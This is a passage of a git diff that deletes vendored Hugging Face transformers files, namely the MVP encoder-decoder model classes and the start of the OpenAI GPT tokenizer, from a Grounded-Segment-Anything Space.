self.encoder.embed_tokens = self.shared - self.decoder.embed_tokens = self.shared - - def get_encoder(self): - return self.encoder - - def get_decoder(self): - return self.decoder - - def set_lightweight_tuning(self): - assert self.use_prompt, "If you want to use lightweight tuning, make sure that `use_prompt=True`." - - self.requires_grad_(False) - self.encoder.self_attn_prompt.requires_grad_(True) - self.decoder.self_attn_prompt.requires_grad_(True) - self.decoder.cross_attn_prompt.requires_grad_(True) - - @add_start_docstrings_to_model_forward(MVP_INPUTS_DOCSTRING) - @add_code_sample_docstrings( - checkpoint=_CHECKPOINT_FOR_DOC, - output_type=Seq2SeqModelOutput, - config_class=_CONFIG_FOR_DOC, - expected_output=_EXPECTED_OUTPUT_SHAPE, - ) - def forward( - self, - input_ids: torch.LongTensor = None, - attention_mask: Optional[torch.Tensor] = None, - decoder_input_ids: Optional[torch.LongTensor] = None, - decoder_attention_mask: Optional[torch.LongTensor] = None, - head_mask: Optional[torch.Tensor] = None, - decoder_head_mask: Optional[torch.Tensor] = None, - cross_attn_head_mask: Optional[torch.Tensor] = None, - encoder_outputs: Optional[List[torch.FloatTensor]] = None, - past_key_values: Optional[List[torch.FloatTensor]] = None, - inputs_embeds: Optional[torch.FloatTensor] = None, - decoder_inputs_embeds: Optional[torch.FloatTensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - ) -> Union[Tuple, Seq2SeqModelOutput]: - # different to other models, Mvp automatically creates decoder_input_ids from - # input_ids if no decoder_input_ids are provided - if decoder_input_ids is None and decoder_inputs_embeds is None: - if input_ids is None: - raise ValueError( - "If no `decoder_input_ids` or `decoder_inputs_embeds` are " - "passed, `input_ids` cannot be `None`. Please pass either " - "`input_ids` or `decoder_input_ids` or `decoder_inputs_embeds`." - ) - - decoder_input_ids = shift_tokens_right( - input_ids, self.config.pad_token_id, self.config.decoder_start_token_id - ) - - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - use_cache = use_cache if use_cache is not None else self.config.use_cache - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - if encoder_outputs is None: - encoder_outputs = self.encoder( - input_ids=input_ids, - attention_mask=attention_mask, - head_mask=head_mask, - inputs_embeds=inputs_embeds, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - # If the user passed a tuple for encoder_outputs, we wrap it in a BaseModelOutput when return_dict=True - elif return_dict and not isinstance(encoder_outputs, BaseModelOutput): - encoder_outputs = BaseModelOutput( - last_hidden_state=encoder_outputs[0], - hidden_states=encoder_outputs[1] if len(encoder_outputs) > 1 else None, - attentions=encoder_outputs[2] if len(encoder_outputs) > 2 else None, - ) - - # decoder outputs consists of (dec_features, past_key_value, dec_hidden, dec_attn) - decoder_outputs = self.decoder( - input_ids=decoder_input_ids, - attention_mask=decoder_attention_mask, - encoder_hidden_states=encoder_outputs[0], - encoder_attention_mask=attention_mask, - head_mask=decoder_head_mask, - cross_attn_head_mask=cross_attn_head_mask, - past_key_values=past_key_values, - inputs_embeds=decoder_inputs_embeds, - use_cache=use_cache, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - - if not return_dict: - return decoder_outputs + encoder_outputs - - return Seq2SeqModelOutput( - last_hidden_state=decoder_outputs.last_hidden_state, - past_key_values=decoder_outputs.past_key_values, - decoder_hidden_states=decoder_outputs.hidden_states, - decoder_attentions=decoder_outputs.attentions, - cross_attentions=decoder_outputs.cross_attentions, - encoder_last_hidden_state=encoder_outputs.last_hidden_state, - encoder_hidden_states=encoder_outputs.hidden_states, - encoder_attentions=encoder_outputs.attentions, - ) - - -@add_start_docstrings( - "The MVP Model with a language modeling head. Can be used for various text generation tasks.", MVP_START_DOCSTRING -) -class MvpForConditionalGeneration(MvpPreTrainedModel): - _tied_weights_keys = ["encoder.embed_tokens.weight", "decoder.embed_tokens.weight", "lm_head.weight"] - - def __init__(self, config: MvpConfig): - super().__init__(config) - self.model = MvpModel(config) - self.register_buffer("final_logits_bias", torch.zeros((1, self.model.shared.num_embeddings))) - self.lm_head = nn.Linear(config.d_model, self.model.shared.num_embeddings, bias=False) - - # Initialize weights and apply final processing - self.post_init() - - def get_encoder(self): - return self.model.get_encoder() - - def get_decoder(self): - return self.model.get_decoder() - - def resize_token_embeddings(self, new_num_tokens: int, pad_to_multiple_of: Optional[int] = None) -> nn.Embedding: - new_embeddings = super().resize_token_embeddings(new_num_tokens, pad_to_multiple_of) - self._resize_final_logits_bias(new_num_tokens) - return new_embeddings - - def _resize_final_logits_bias(self, new_num_tokens: int) -> None: - old_num_tokens = self.final_logits_bias.shape[-1] - if new_num_tokens <= old_num_tokens: - new_bias = self.final_logits_bias[:, :new_num_tokens] - else: - extra_bias = torch.zeros((1, new_num_tokens - old_num_tokens), device=self.final_logits_bias.device) - new_bias = torch.cat([self.final_logits_bias, extra_bias], dim=1) - self.register_buffer("final_logits_bias", new_bias) - - def get_output_embeddings(self): - return self.lm_head - - def set_output_embeddings(self, new_embeddings): - self.lm_head = new_embeddings - - def set_lightweight_tuning(self): - self.model.set_lightweight_tuning() - self.lm_head.requires_grad_(False) - - @add_start_docstrings_to_model_forward(MVP_INPUTS_DOCSTRING) - @replace_return_docstrings(output_type=Seq2SeqLMOutput, config_class=_CONFIG_FOR_DOC) - @add_end_docstrings(MVP_CONDITIONAL_GENERATION_EXAMPLE) - def forward( - self, - input_ids: torch.LongTensor = None, - attention_mask: Optional[torch.Tensor] = None, - decoder_input_ids: Optional[torch.LongTensor] = None, - decoder_attention_mask: Optional[torch.LongTensor] = None, - head_mask: Optional[torch.Tensor] = None, - decoder_head_mask: Optional[torch.Tensor] = None, - cross_attn_head_mask: Optional[torch.Tensor] = None, - encoder_outputs: Optional[List[torch.FloatTensor]] = None, - past_key_values: Optional[List[torch.FloatTensor]] = None, - inputs_embeds: Optional[torch.FloatTensor] = None, - decoder_inputs_embeds: Optional[torch.FloatTensor] = None, - labels: Optional[torch.LongTensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - ) -> Union[Tuple, Seq2SeqLMOutput]: - r""" - labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*): - Labels for computing the masked language modeling loss. Indices should either be in `[0, ..., - config.vocab_size]` or -100 (see `input_ids` docstring). Tokens with indices set to `-100` are ignored - (masked), the loss is only computed for the tokens with labels in `[0, ..., config.vocab_size]`. - - Returns: - """ - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - if labels is not None: - if use_cache: - logger.warning("The `use_cache` argument is changed to `False` since `labels` is provided.") - use_cache = False - if decoder_input_ids is None and decoder_inputs_embeds is None: - decoder_input_ids = shift_tokens_right( - labels, self.config.pad_token_id, self.config.decoder_start_token_id - ) - - outputs = self.model( - input_ids, - attention_mask=attention_mask, - decoder_input_ids=decoder_input_ids, - encoder_outputs=encoder_outputs, - decoder_attention_mask=decoder_attention_mask, - head_mask=head_mask, - decoder_head_mask=decoder_head_mask, - cross_attn_head_mask=cross_attn_head_mask, - past_key_values=past_key_values, - inputs_embeds=inputs_embeds, - decoder_inputs_embeds=decoder_inputs_embeds, - use_cache=use_cache, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - lm_logits = self.lm_head(outputs[0]) + self.final_logits_bias - - masked_lm_loss = None - if labels is not None: - loss_fct = CrossEntropyLoss() - masked_lm_loss = loss_fct(lm_logits.view(-1, self.config.vocab_size), labels.view(-1)) - - if not return_dict: - output = (lm_logits,) + outputs[1:] - return ((masked_lm_loss,) + output) if masked_lm_loss is not None else output - - return Seq2SeqLMOutput( - loss=masked_lm_loss, - logits=lm_logits, - past_key_values=outputs.past_key_values, - decoder_hidden_states=outputs.decoder_hidden_states, - decoder_attentions=outputs.decoder_attentions, - cross_attentions=outputs.cross_attentions, - encoder_last_hidden_state=outputs.encoder_last_hidden_state, - encoder_hidden_states=outputs.encoder_hidden_states, - encoder_attentions=outputs.encoder_attentions, - ) - - def prepare_inputs_for_generation( - self, - decoder_input_ids, - past_key_values=None, - attention_mask=None, - head_mask=None, - decoder_head_mask=None, - cross_attn_head_mask=None, - use_cache=None, - encoder_outputs=None, - **kwargs, - ): - # cut decoder_input_ids if past is used - if past_key_values is not None: - decoder_input_ids = decoder_input_ids[:, -1:] - - return { - "input_ids": None, # encoder_outputs is defined. input_ids not needed - "encoder_outputs": encoder_outputs, - "past_key_values": past_key_values, - "decoder_input_ids": decoder_input_ids, - "attention_mask": attention_mask, - "head_mask": head_mask, - "decoder_head_mask": decoder_head_mask, - "cross_attn_head_mask": cross_attn_head_mask, - "use_cache": use_cache, # change this to avoid caching (presumably for debugging) - } - - def prepare_decoder_input_ids_from_labels(self, labels: torch.Tensor): - return shift_tokens_right(labels, self.config.pad_token_id, self.config.decoder_start_token_id) - - @staticmethod - def _reorder_cache(past_key_values, beam_idx): - reordered_past = () - for layer_past in past_key_values: - # cached cross_attention states don't have to be reordered -> they are always the same - reordered_past += ( - tuple(past_state.index_select(0, beam_idx.to(past_state.device)) for past_state in layer_past[:2]) - + layer_past[2:], - ) - return reordered_past - - -@add_start_docstrings( - """ - Mvp model with a sequence classification/head on top (a linear layer on top of the pooled output) e.g. for GLUE - tasks. - """, - MVP_START_DOCSTRING, -) -class MvpForSequenceClassification(MvpPreTrainedModel): - _tied_weights_keys = ["encoder.embed_tokens.weight", "decoder.embed_tokens.weight"] - - def __init__(self, config: MvpConfig, **kwargs): - super().__init__(config, **kwargs) - self.model = MvpModel(config) - self.classification_head = MvpClassificationHead( - config.d_model, - config.d_model, - config.num_labels, - config.classifier_dropout, - ) - - # Initialize weights and apply final processing - self.post_init() - - def set_lightweight_tuning(self): - self.model.set_lightweight_tuning() - self.classification_head.requires_grad_(False) - - @add_start_docstrings_to_model_forward(MVP_INPUTS_DOCSTRING) - @add_end_docstrings(MVP_SEQUENCE_CLASSIFICATION_SAMPLE) - def forward( - self, - input_ids: torch.LongTensor = None, - attention_mask: Optional[torch.Tensor] = None, - decoder_input_ids: Optional[torch.LongTensor] = None, - decoder_attention_mask: Optional[torch.LongTensor] = None, - head_mask: Optional[torch.Tensor] = None, - decoder_head_mask: Optional[torch.Tensor] = None, - cross_attn_head_mask: Optional[torch.Tensor] = None, - encoder_outputs: Optional[List[torch.FloatTensor]] = None, - inputs_embeds: Optional[torch.FloatTensor] = None, - decoder_inputs_embeds: Optional[torch.FloatTensor] = None, - labels: Optional[torch.LongTensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - ) -> Union[Tuple, Seq2SeqSequenceClassifierOutput]: - r""" - labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*): - Labels for computing the sequence classification/regression loss. Indices should be in `[0, ..., - config.num_labels - 1]`. If `config.num_labels > 1` a classification loss is computed (Cross-Entropy). - """ - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - if labels is not None: - use_cache = False - - if input_ids is None and inputs_embeds is not None: - raise NotImplementedError( - f"Passing input embeddings is currently not supported for {self.__class__.__name__}" - ) - - outputs = self.model( - input_ids, - attention_mask=attention_mask, - decoder_input_ids=decoder_input_ids, - decoder_attention_mask=decoder_attention_mask, - head_mask=head_mask, - decoder_head_mask=decoder_head_mask, - cross_attn_head_mask=cross_attn_head_mask, - encoder_outputs=encoder_outputs, - inputs_embeds=inputs_embeds, - decoder_inputs_embeds=decoder_inputs_embeds, - use_cache=use_cache, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - hidden_states = outputs[0] # last hidden state - - eos_mask = input_ids.eq(self.config.eos_token_id).to(hidden_states.device) - - if len(torch.unique_consecutive(eos_mask.sum(1))) > 1: - raise ValueError("All examples must have the same number of tokens.") - sentence_representation = hidden_states[eos_mask, :].view(hidden_states.size(0), -1, hidden_states.size(-1))[ - :, -1, : - ] - logits = self.classification_head(sentence_representation) - - loss = None - if labels is not None: - if self.config.problem_type is None: - if self.config.num_labels == 1: - self.config.problem_type = "regression" - elif self.config.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int): - self.config.problem_type = "single_label_classification" - else: - self.config.problem_type = "multi_label_classification" - - if self.config.problem_type == "regression": - loss_fct = MSELoss() - if self.config.num_labels == 1: - loss = loss_fct(logits.squeeze(), labels.squeeze()) - else: - loss = loss_fct(logits, labels) - elif self.config.problem_type == "single_label_classification": - loss_fct = CrossEntropyLoss() - loss = loss_fct(logits.view(-1, self.config.num_labels), labels.view(-1)) - elif self.config.problem_type == "multi_label_classification": - loss_fct = BCEWithLogitsLoss() - loss = loss_fct(logits, labels) - if not return_dict: - output = (logits,) + outputs[1:] - return ((loss,) + output) if loss is not None else output - - return Seq2SeqSequenceClassifierOutput( - loss=loss, - logits=logits, - past_key_values=outputs.past_key_values, - decoder_hidden_states=outputs.decoder_hidden_states, - decoder_attentions=outputs.decoder_attentions, - cross_attentions=outputs.cross_attentions, - encoder_last_hidden_state=outputs.encoder_last_hidden_state, - encoder_hidden_states=outputs.encoder_hidden_states, - encoder_attentions=outputs.encoder_attentions, - ) - - -@add_start_docstrings( - """ - MVP Model with a span classification head on top for extractive question-answering tasks like SQuAD (a linear layer - on top of the hidden-states output to compute `span start logits` and `span end logits`). - """, - MVP_START_DOCSTRING, -) -class MvpForQuestionAnswering(MvpPreTrainedModel): - _tied_weights_keys = ["encoder.embed_tokens.weight", "decoder.embed_tokens.weight"] - - def __init__(self, config): - super().__init__(config) - - config.num_labels = 2 - self.num_labels = config.num_labels - - self.model = MvpModel(config) - self.qa_outputs = nn.Linear(config.hidden_size, config.num_labels) - - # Initialize weights and apply final processing - self.post_init() - - def set_lightweight_tuning(self): - self.model.set_lightweight_tuning() - self.qa_outputs.requires_grad_(False) - - @add_start_docstrings_to_model_forward(MVP_INPUTS_DOCSTRING) - @add_end_docstrings(MVP_QUESTION_ANSWERING_SAMPLE) - def forward( - self, - input_ids: torch.Tensor = None, - attention_mask: Optional[torch.Tensor] = None, - decoder_input_ids: Optional[torch.LongTensor] = None, - decoder_attention_mask: Optional[torch.LongTensor] = None, - head_mask: Optional[torch.Tensor] = None, - decoder_head_mask: Optional[torch.Tensor] = None, - cross_attn_head_mask: Optional[torch.Tensor] = None, - encoder_outputs: Optional[List[torch.FloatTensor]] = None, - start_positions: Optional[torch.LongTensor] = None, - end_positions: Optional[torch.LongTensor] = None, - inputs_embeds: Optional[torch.FloatTensor] = None, - decoder_inputs_embeds: Optional[torch.FloatTensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - ) -> Union[Tuple, Seq2SeqQuestionAnsweringModelOutput]: - r""" - start_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*): - Labels for position (index) of the start of the labelled span for computing the token classification loss. - Positions are clamped to the length of the sequence (*sequence_length*). Position outside of the sequence - are not taken into account for computing the loss. - end_positions (`torch.LongTensor` of shape `(batch_size,)`, *optional*): - Labels for position (index) of the end of the labelled span for computing the token classification loss. - Positions are clamped to the length of the sequence (*sequence_length*). Position outside of the sequence - are not taken into account for computing the loss. - """ - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - if start_positions is not None and end_positions is not None: - use_cache = False - - outputs = self.model( - input_ids, - attention_mask=attention_mask, - decoder_input_ids=decoder_input_ids, - decoder_attention_mask=decoder_attention_mask, - head_mask=head_mask, - decoder_head_mask=decoder_head_mask, - cross_attn_head_mask=cross_attn_head_mask, - encoder_outputs=encoder_outputs, - inputs_embeds=inputs_embeds, - decoder_inputs_embeds=decoder_inputs_embeds, - use_cache=use_cache, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - - sequence_output = outputs[0] - - logits = self.qa_outputs(sequence_output) - start_logits, end_logits = logits.split(1, dim=-1) - start_logits = start_logits.squeeze(-1).contiguous() - end_logits = end_logits.squeeze(-1).contiguous() - - total_loss = None - if start_positions is not None and end_positions is not None: - # If we are on multi-GPU, split add a dimension - if len(start_positions.size()) > 1: - start_positions = start_positions.squeeze(-1) - if len(end_positions.size()) > 1: - end_positions = end_positions.squeeze(-1) - # sometimes the start/end positions are outside our model inputs, we ignore these terms - ignored_index = start_logits.size(1) - start_positions = start_positions.clamp(0, ignored_index) - end_positions = end_positions.clamp(0, ignored_index) - - loss_fct = CrossEntropyLoss(ignore_index=ignored_index) - start_loss = loss_fct(start_logits, start_positions) - end_loss = loss_fct(end_logits, end_positions) - total_loss = (start_loss + end_loss) / 2 - - if not return_dict: - output = ( - start_logits, - end_logits, - ) + outputs[1:] - return ((total_loss,) + output) if total_loss is not None else output - - return Seq2SeqQuestionAnsweringModelOutput( - loss=total_loss, - start_logits=start_logits, - end_logits=end_logits, - past_key_values=outputs.past_key_values, - decoder_hidden_states=outputs.decoder_hidden_states, - decoder_attentions=outputs.decoder_attentions, - cross_attentions=outputs.cross_attentions, - encoder_last_hidden_state=outputs.encoder_last_hidden_state, - encoder_hidden_states=outputs.encoder_hidden_states, - encoder_attentions=outputs.encoder_attentions, - ) - - -# Copied from transformers.models.bart.modeling_bart.BartDecoderWrapper with Bart->Mvp -class MvpDecoderWrapper(MvpPreTrainedModel): - """ - This wrapper class is a helper class to correctly load pretrained checkpoints when the causal language model is - used in combination with the [`EncoderDecoderModel`] framework. - """ - - def __init__(self, config): - super().__init__(config) - self.decoder = MvpDecoder(config) - - def forward(self, *args, **kwargs): - return self.decoder(*args, **kwargs) - - -class MvpForCausalLM(MvpPreTrainedModel): - _tied_weights_keys = ["lm_head.weight"] - - def __init__(self, config): - config = copy.deepcopy(config) - config.is_decoder = True - config.is_encoder_decoder = False - super().__init__(config) - self.model = MvpDecoderWrapper(config) - - self.lm_head = nn.Linear(config.hidden_size, config.vocab_size, bias=False) - - # Initialize weights and apply final processing - self.post_init() - - def get_input_embeddings(self): - return self.model.decoder.embed_tokens - - def set_input_embeddings(self, value): - self.model.decoder.embed_tokens = value - - def get_output_embeddings(self): - return self.lm_head - - def set_output_embeddings(self, new_embeddings): - self.lm_head = new_embeddings - - def set_decoder(self, decoder): - self.model.decoder = decoder - - def get_decoder(self): - return self.model.decoder - - def set_lightweight_tuning(self): - self.model.set_lightweight_tuning() - self.lm_head.requires_grad_(False) - - @replace_return_docstrings(output_type=CausalLMOutputWithCrossAttentions, config_class=_CONFIG_FOR_DOC) - def forward( - self, - input_ids: torch.LongTensor = None, - attention_mask: Optional[torch.Tensor] = None, - encoder_hidden_states: Optional[torch.FloatTensor] = None, - encoder_attention_mask: Optional[torch.FloatTensor] = None, - head_mask: Optional[torch.Tensor] = None, - cross_attn_head_mask: Optional[torch.Tensor] = None, - past_key_values: Optional[List[torch.FloatTensor]] = None, - inputs_embeds: Optional[torch.FloatTensor] = None, - labels: Optional[torch.LongTensor] = None, - use_cache: Optional[bool] = None, - output_attentions: Optional[bool] = None, - output_hidden_states: Optional[bool] = None, - return_dict: Optional[bool] = None, - ) -> Union[Tuple, CausalLMOutputWithCrossAttentions]: - r""" - Args: - input_ids (`torch.LongTensor` of shape `(batch_size, sequence_length)`): - Indices of input sequence tokens in the vocabulary. Padding will be ignored by default should you - provide it. - - Indices can be obtained using [`AutoTokenizer`]. See [`PreTrainedTokenizer.encode`] and - [`PreTrainedTokenizer.__call__`] for details. - - [What are input IDs?](../glossary#input-ids) - attention_mask (`torch.Tensor` of shape `(batch_size, sequence_length)`, *optional*): - Mask to avoid performing attention on padding token indices. Mask values selected in `[0, 1]`: - - - 1 for tokens that are **not masked**, - - 0 for tokens that are **masked**. - - [What are attention masks?](../glossary#attention-mask) - encoder_hidden_states (`torch.FloatTensor` of shape `(batch_size, sequence_length, hidden_size)`, *optional*): - Sequence of hidden-states at the output of the last layer of the encoder. Used in the cross-attention - if the model is configured as a decoder. - encoder_attention_mask (`torch.FloatTensor` of shape `(batch_size, sequence_length)`, *optional*): - Mask to avoid performing attention on the padding token indices of the encoder input. This mask is used - in the cross-attention if the model is configured as a decoder. Mask values selected in `[0, 1]`: - head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*): - Mask to nullify selected heads of the attention modules. Mask values selected in `[0, 1]`: - - - 1 indicates the head is **not masked**, - - 0 indicates the head is **masked**. - - cross_attn_head_mask (`torch.Tensor` of shape `(decoder_layers, decoder_attention_heads)`, *optional*): - Mask to nullify selected heads of the cross-attention modules. Mask values selected in `[0, 1]`: - - - 1 indicates the head is **not masked**, - - 0 indicates the head is **masked**. - - past_key_values (`tuple(tuple(torch.FloatTensor))`, *optional*, returned when `use_cache=True` is passed or when `config.use_cache=True`): - Tuple of `tuple(torch.FloatTensor)` of length `config.n_layers`, with each tuple having 2 tensors of - shape `(batch_size, num_heads, sequence_length, embed_size_per_head)`) and 2 additional tensors of - shape `(batch_size, num_heads, encoder_sequence_length, embed_size_per_head)`. The two additional - tensors are only required when the model is used as a decoder in a Sequence to Sequence model. - - Contains pre-computed hidden-states (key and values in the self-attention blocks and in the - cross-attention blocks) that can be used (see `past_key_values` input) to speed up sequential decoding. - - If `past_key_values` are used, the user can optionally input only the last `decoder_input_ids` (those - that don't have their past key value states given to this model) of shape `(batch_size, 1)` instead of - all `decoder_input_ids` of shape `(batch_size, sequence_length)`. - labels (`torch.LongTensor` of shape `(batch_size, sequence_length)`, *optional*): - Labels for computing the masked language modeling loss. Indices should either be in `[0, ..., - config.vocab_size]` or -100 (see `input_ids` docstring). Tokens with indices set to `-100` are ignored - (masked), the loss is only computed for the tokens with labels in `[0, ..., config.vocab_size]`. - use_cache (`bool`, *optional*): - If set to `True`, `past_key_values` key value states are returned and can be used to speed up decoding - (see `past_key_values`). - - - 1 for tokens that are **not masked**, - - 0 for tokens that are **masked**. - output_attentions (`bool`, *optional*): - Whether or not to return the attentions tensors of all attention layers. See `attentions` under - returned tensors for more detail. - output_hidden_states (`bool`, *optional*): - Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors - for more detail. - return_dict (`bool`, *optional*): - Whether or not to return a [`~utils.ModelOutput`] instead of a plain tuple. - - Returns: - - Example: - - ```python - >>> from transformers import AutoTokenizer, MvpForCausalLM - - >>> tokenizer = AutoTokenizer.from_pretrained("RUCAIBox/mvp") - >>> model = MvpForCausalLM.from_pretrained("RUCAIBox/mvp", add_cross_attention=False) - - >>> inputs = tokenizer("Hello, my dog is cute", return_tensors="pt") - >>> outputs = model(**inputs) - - >>> logits = outputs.logits - >>> list(logits.shape) - [1, 8, 50267] - ```""" - - output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions - output_hidden_states = ( - output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states - ) - return_dict = return_dict if return_dict is not None else self.config.use_return_dict - - # decoder outputs consists of (dec_features, layer_state, dec_hidden, dec_attn) - outputs = self.model.decoder( - input_ids=input_ids, - attention_mask=attention_mask, - encoder_hidden_states=encoder_hidden_states, - encoder_attention_mask=encoder_attention_mask, - head_mask=head_mask, - cross_attn_head_mask=cross_attn_head_mask, - past_key_values=past_key_values, - inputs_embeds=inputs_embeds, - use_cache=use_cache, - output_attentions=output_attentions, - output_hidden_states=output_hidden_states, - return_dict=return_dict, - ) - - logits = self.lm_head(outputs[0]) - - loss = None - if labels is not None: - loss_fct = CrossEntropyLoss() - loss = loss_fct(logits.view(-1, self.config.vocab_size), labels.view(-1)) - - if not return_dict: - output = (logits,) + outputs[1:] - return (loss,) + output if loss is not None else output - - return CausalLMOutputWithCrossAttentions( - loss=loss, - logits=logits, - past_key_values=outputs.past_key_values, - hidden_states=outputs.hidden_states, - attentions=outputs.attentions, - cross_attentions=outputs.cross_attentions, - ) - - def prepare_inputs_for_generation( - self, input_ids, past_key_values=None, attention_mask=None, use_cache=None, **kwargs - ): - # if model is used as a decoder in encoder-decoder model, the decoder attention mask is created on the fly - if attention_mask is None: - attention_mask = input_ids.new_ones(input_ids.shape) - - if past_key_values: - input_ids = input_ids[:, -1:] - # first step, decoder_cached_states are empty - return { - "input_ids": input_ids, # encoder_outputs is defined. input_ids not needed - "attention_mask": attention_mask, - "past_key_values": past_key_values, - "use_cache": use_cache, - } - - @staticmethod - def _reorder_cache(past_key_values, beam_idx): - reordered_past = () - for layer_past in past_key_values: - reordered_past += ( - tuple(past_state.index_select(0, beam_idx.to(past_state.device)) for past_state in layer_past), - ) - return reordered_past diff --git a/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/openai/tokenization_openai.py b/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/openai/tokenization_openai.py deleted file mode 100644 index cfdeb3207a6d9674f194faed6c674bf023e056f4..0000000000000000000000000000000000000000 --- a/spaces/yizhangliu/Grounded-Segment-Anything/transformers_4_35_0/models/openai/tokenization_openai.py +++ /dev/null @@ -1,405 +0,0 @@ -# coding=utf-8 -# Copyright 2018 The Open AI Team Authors and The HuggingFace Inc. team. -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -"""Tokenization classes for OpenAI GPT.""" - - -import json -import os -import re -import unicodedata -from typing import Optional, Tuple - -from ...tokenization_utils import PreTrainedTokenizer, _is_control, _is_punctuation, _is_whitespace -from ...utils import logging - - -logger = logging.get_logger(__name__) - -VOCAB_FILES_NAMES = { - "vocab_file": "vocab.json", - "merges_file": "merges.txt", -} - -PRETRAINED_VOCAB_FILES_MAP = { - "vocab_file": {"openai-gpt": "https://huggingface.co/openai-gpt/resolve/main/vocab.json"}, - "merges_file": {"openai-gpt": "https://huggingface.co/openai-gpt/resolve/main/merges.txt"}, -} - -PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = { - "openai-gpt": 512, -} - - -# Copied from transformers.models.bert.tokenization_bert.whitespace_tokenize -def whitespace_tokenize(text): - """Runs basic whitespace cleaning and splitting on a piece of text.""" - text = text.strip() - if not text: - return [] - tokens = text.split() - return tokens - - -# Copied from transformers.models.bert.tokenization_bert.BasicTokenizer -class BasicTokenizer(object): - """ - Constructs a BasicTokenizer that will run basic tokenization (punctuation splitting, lower casing, etc.). - - Args: - do_lower_case (`bool`, *optional*, defaults to `True`): - Whether or not to lowercase the input when tokenizing. - never_split (`Iterable`, *optional*): - Collection of tokens which will never be split during tokenization. Only has an effect when - `do_basic_tokenize=True` - tokenize_chinese_chars (`bool`, *optional*, defaults to `True`): - Whether or not to tokenize Chinese characters. - - This should likely be deactivated for Japanese (see this - [issue](https://github.com/huggingface/transformers/issues/328)). - strip_accents (`bool`, *optional*): - Whether or not to strip all accents. If this option is not specified, then it will be determined by the - value for `lowercase` (as in the original BERT). - do_split_on_punc (`bool`, *optional*, defaults to `True`): - In some instances we want to skip the basic punctuation splitting so that later tokenization can capture - the full context of the words, such as contractions. - """ - - def __init__( - self, - do_lower_case=True, - never_split=None, - tokenize_chinese_chars=True, - strip_accents=None, - do_split_on_punc=True, - ): - if never_split is None: - never_split = [] - self.do_lower_case = do_lower_case - self.never_split = set(never_split) - self.tokenize_chinese_chars = tokenize_chinese_chars - self.strip_accents = strip_accents - self.do_split_on_punc = do_split_on_punc - - def tokenize(self, text, never_split=None): - """ - Basic Tokenization of a piece of text. For sub-word tokenization, see WordPieceTokenizer. - - Args: - never_split (`List[str]`, *optional*) - Kept for backward compatibility purposes. Now implemented directly at the base class level (see - [`PreTrainedTokenizer.tokenize`]) List of token not to split. - """ - # union() returns a new set by concatenating the two sets. - never_split = self.never_split.union(set(never_split)) if never_split else self.never_split - text = self._clean_text(text) - - # This was added on November 1st, 2018 for the multilingual and Chinese - # models. This is also applied to the English models now, but it doesn't - # matter since the English models were not trained on any Chinese data - # and generally don't have any Chinese data in them (there are Chinese - # characters in the vocabulary because Wikipedia does have some Chinese - # words in the English Wikipedia.). - if self.tokenize_chinese_chars: - text = self._tokenize_chinese_chars(text) - # prevents treating the same character with different unicode codepoints as different characters - unicode_normalized_text = unicodedata.normalize("NFC", text) - orig_tokens = whitespace_tokenize(unicode_normalized_text) - split_tokens = [] - for token in orig_tokens: - if token not in never_split: - if self.do_lower_case: - token = token.lower() - if self.strip_accents is not False: - token = self._run_strip_accents(token) - elif self.strip_accents: - token = self._run_strip_accents(token) - split_tokens.extend(self._run_split_on_punc(token, never_split)) - - output_tokens = whitespace_tokenize(" ".join(split_tokens)) - return output_tokens - - def _run_strip_accents(self, text): - """Strips accents from a piece of text.""" - text = unicodedata.normalize("NFD", text) - output = [] - for char in text: - cat = unicodedata.category(char) - if cat == "Mn": - continue - output.append(char) - return "".join(output) - - def _run_split_on_punc(self, text, never_split=None): - """Splits punctuation on a piece of text.""" - if not self.do_split_on_punc or (never_split is not None and text in never_split): - return [text] - chars = list(text) - i = 0 - start_new_word = True - output = [] - while i < len(chars): - char = chars[i] - if _is_punctuation(char): - output.append([char]) - start_new_word = True - else: - if start_new_word: - output.append([]) - start_new_word = False - output[-1].append(char) - i += 1 - - return ["".join(x) for x in output] - - def _tokenize_chinese_chars(self, text): - """Adds whitespace around any CJK character.""" - output = [] - for char in text: - cp = ord(char) - if self._is_chinese_char(cp): - output.append(" ") - output.append(char) - output.append(" ") - else: - output.append(char) - return "".join(output) - - def _is_chinese_char(self, cp): - """Checks whether CP is the codepoint of a CJK character.""" - # This defines 